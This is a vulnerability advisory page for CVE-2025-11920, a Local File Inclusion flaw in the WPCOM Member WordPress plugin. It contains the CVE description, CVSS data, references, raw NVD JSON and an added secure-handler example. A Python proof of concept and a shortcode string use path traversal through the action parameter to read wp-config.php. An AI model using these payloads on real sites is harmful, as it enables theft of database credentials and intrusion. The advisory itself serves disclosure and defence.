Security Vulnerability Report
CVE-2025-11920 CVSS 8.8 HIGH

CVE-2025-11920

Published: 2025-11-01 02:15:33
Last Modified: 2026-04-15 00:35:42

Description

The WPCOM Member plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.7.14 via the action parameter in one of its shortcodes. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.
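For contrast, a defensive counterpart added here as an illustration (this is not the WPCOM Member plugin's code or its fix): a hypothetical WordPress shortcode handler that never builds an include path from the `action` attribute, but maps it through a fixed allowlist and then confirms the resolved file still lies inside the plugin's template directory. The handler name, shortcode tag and template file names are assumptions.

```php
<?php
// Added illustration of a CWE-98-safe shortcode handler (hypothetical;
// not the WPCOM Member plugin's code). Shortcode attributes are untrusted:
// any Contributor who can save a post can set them. The `action` value is
// therefore used only as a key into a fixed map, never as part of a path.
function example_member_shortcode( $atts ) {
    $atts = shortcode_atts( array( 'action' => 'profile' ), $atts, 'example_member' );

    // Allowlist: every value the attribute may take and the file it selects.
    $templates = array(
        'profile'  => 'profile.php',
        'login'    => 'login.php',
        'register' => 'register.php',
    );

    $action = (string) $atts['action'];
    if ( ! isset( $templates[ $action ] ) ) {
        // Unknown action: refuse; do not fall back to anything derived from input.
        return '';
    }

    // Resolve the file and confirm it is inside the plugin's templates directory,
    // so even a mistake in the map above cannot reach ../wp-config.php.
    $base = realpath( plugin_dir_path( __FILE__ ) . 'templates' );
    $file = realpath( $base . DIRECTORY_SEPARATOR . $templates[ $action ] );
    if ( false === $base || false === $file
         || 0 !== strpos( $file, $base . DIRECTORY_SEPARATOR ) ) {
        return '';
    }

    ob_start();
    include $file;
    return ob_get_clean();
}
add_shortcode( 'example_member', 'example_member_shortcode' );
```

The same pattern (allowlist first, `realpath` containment check second) applies to any plugin that selects a template from a shortcode attribute or request parameter.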

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WPCOM Member plugin < 1.7.15 (all versions 1.7.14 and earlier)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11920 PoC - WPCOM Member LFI
# Requirements: Contributor-level WordPress account
#
# Read wp-config.php
import requests

target_url = "http://target-wordpress-site.com/"
username = "attacker"
password = "attacker_password"

# Login to WordPress
session = requests.Session()
login_url = target_url + "wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In"
}
session.post(login_url, data=login_data)

# Exploit LFI via shortcode action parameter
# Method 1: Direct file inclusion via shortcode
exploit_url = target_url
params = {
    "shortcode": "wpcom_member",
    "action": "../../../../wp-config.php"  # Path traversal to read config
}

# Method 2: Using the vulnerable shortcode directly in post content
malicious_shortcode = """
[wpcom_member action="../../../../wp-config.php"]
"""

# Method 3: Direct request exploitation
# The vulnerable code is in includes/class-member.php
# Access via: ?action=../../../../wp-config.php

print("[*] CVE-2025-11920 - WPCOM Member LFI PoC")
print("[*] Target:", target_url)
print("[*] Exploiting via action parameter in shortcode...")

# Send exploit request
response = session.get(target_url, params=params)
if "DB_NAME" in response.text or "define" in response.text:
    print("[+] SUCCESS: Config file contents leaked!")
    print(response.text[:500])
else:
    print("[-] Exploitation failed or file not found")

References

https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.13/includes/class-member.php#L1119
https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.13/includes/class-member.php#L1171
https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.13/includes/class-member.php#L374
https://plugins.trac.wordpress.org/changeset/3385562/wpcom-member/trunk
https://www.wordfence.com/threat-intel/vulnerabilities/id/43b04825-d1c6-4e2a-9035-1f4fbfe14818?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11920",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-01T02:15:33.037",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WPCOM Member plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.7.14 via the action parameter in one of its shortcodes. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-98"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.13/includes/class-member.php#L1119",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.13/includes/class-member.php#L1171",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.13/includes/class-member.php#L374",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3385562/wpcom-member/trunk",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/43b04825-d1c6-4e2a-9035-1f4fbfe14818?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}